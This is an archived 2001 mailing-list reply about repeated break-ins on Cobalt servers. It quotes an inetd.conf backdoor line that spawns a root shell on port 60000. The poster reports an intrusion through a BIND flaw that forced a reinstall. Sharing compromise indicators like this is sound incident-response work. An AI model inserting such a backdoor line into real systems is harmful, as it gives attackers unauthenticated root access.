[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] Sigh, more security breaches

Subject: Re: [cobalt-users] Sigh, more security breaches
From: "Dan" <daniel@xxxxxxxxxxxxxxxxxxxxxxxx>
Date: Fri Mar 9 01:08:07 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

>
>     60000 stream tcp nowait root /bin/sh sh -i
>
> Does this looks familiar to anyone?
>

Hi,

All I know is we were hacked AGAIN after the updates (seems there was
something wong with the patch update script according to my hosts) and Port
60000 gave root access through telnet. Apparently they got in through the
BIND loophole. They had to re-install the OS again :-(

Dan

References:
- [cobalt-users] PHP via cronjob
  - From: Manuel Schmidt
- Re: [cobalt-users] PHP via cronjob
  - From: Nico Meijer
- Re: [cobalt-users] PHP via cronjob
  - From: Carrie Bartkowiak
- [cobalt-users] Sigh, more security breaches
  - From: Boon Yeo

Prev by Date: [cobalt-users] Cron is dead
Next by Date: [cobalt-users] proxy abuse/porn-site banner-ad impression scripts
Previous by thread: [cobalt-users] Sigh, more security breaches
Next by thread: RE: [cobalt-users] Sigh, more security breaches

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index